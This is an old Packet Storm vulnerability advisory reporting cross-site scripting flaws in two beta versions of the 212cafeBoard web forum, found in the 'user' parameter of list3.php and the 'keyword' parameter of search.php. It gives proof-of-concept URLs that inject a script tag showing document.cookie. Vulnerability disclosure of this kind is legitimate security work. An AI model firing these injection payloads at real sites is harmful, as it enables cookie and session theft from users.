212cafeboard-xss.txt

2007-01-24T00:00:00
ID PACKETSTORM:53854
Type packetstorm
Reporter Linux_Drox
Modified 2007-01-24T00:00:00

Description

                                        
                                            `Hello  
  
Vulnerable : 212cafeBoard   
Version: 0.08 Beta  
6.30 Beta  
Web : http://www.212cafe.com  
  
  
i found XSS 212cafeBoard v6.30 Beta :  
  
  
http://www.example.com/Board/list3.php?user=[XSS]  
  
For Example , you can put :  
http://www.example.com/board/list3.php?user='><script>alert(document.cookie);</script>  
  
-----------------  
and i found XSS in 212cafeBoard v0.08 beta   
  
  
http://www.example.com/board/search.php?keyword=[XSS]  
  
For Example :  
http://www.example.com/board/search.php?keyword='><script>alert(document.cookie);</script>  
  
  
-------------------  
Discoverey By Linux_Drox  
www.LeZr.Com/vb  
  
Best Regards ,,,,  
`